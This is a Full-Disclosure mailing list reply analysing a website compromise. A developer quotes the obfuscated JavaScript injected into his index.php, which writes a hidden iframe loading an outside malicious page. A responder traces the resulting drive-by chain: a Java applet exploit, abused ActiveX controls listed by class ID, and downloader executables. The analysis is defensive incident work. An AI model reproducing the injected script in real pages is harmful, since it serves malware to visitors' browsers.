Re: any idea what is going on here?

[Andrew Farmer <andfarm () gmail com>]

On 04 Jan 07, at 13:37, Ian Shaw wrote:
> A website that I am developing has had BackDoor-CUS!php uploaded to  
> the images directory.  My faulty entirely due to permissions set.
>
> This has resulted in
>
> <html>
> <script language="javascript">
> s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 
> 2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61% 
> 67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54% 
> 48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52% 
> 47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49% 
> 44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F 
> %22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45% 
> 53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
> document.writeln(s);document.close();
> </script>
> </html>
>
> being added to the top of index.php.
>
> Unencoded this reads
>
> iframe src=" http://www.nownames.org/images/in.php?adv=3";  
> WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0"  
> SCROLLING="auto" frameborder="0" NORESIZE>
>
> When I go to this an applet appear to run but I am not sure what  
> doing.  Closed my browser out of fear.
>
> Does anyone know what it is attempting to do?

The iframe source loads an obfuscated Javascript which, when decoded,  
loads a Java applet and subsequently attempts several exploits.

I have disassembled the Java applet. It contains some obfuscation of  
its own, defining classes at runtime from inline byte arrays. It  
appears to exploit the Microsoft Java VM by overloading  
SecurityClassLoader at runtime.

One is against a number of ActiveX plugins which implement  
CreateObject or GetObject methods which may be used to create a  
WScriptShell. The class IDs of the plugins in question are:

{BD96C556-65A3-11D0-983A-00C04FC29E36}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43c8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44f9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496b-B050-6C07C962476B}

If such an plugin is found, the script loads and runs a small Windows  
executable. I have not fully analyzed this executable, but it appears  
to be a downloader which is not identified by Kapersky. It loads a  
third executable in MS-DOS format from another site. None of my tools  
can disassemble this, but Kapersky identifies it as Trojan- 
Downloader.Win32.Small.avw: *another* loader.

Following this, the decrypted script contains part of another  
exploit. The exploit is truncated, so I'm not sure exactly what it's  
targeting. There's a lot of Unicode shellcode escaping going on, but  
the final "attack" is missing. This may be due to a bug in the  
decryption routine.

All files are available on request, if anyone's interested in doing  
some further analysis of their own.


That was fun :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/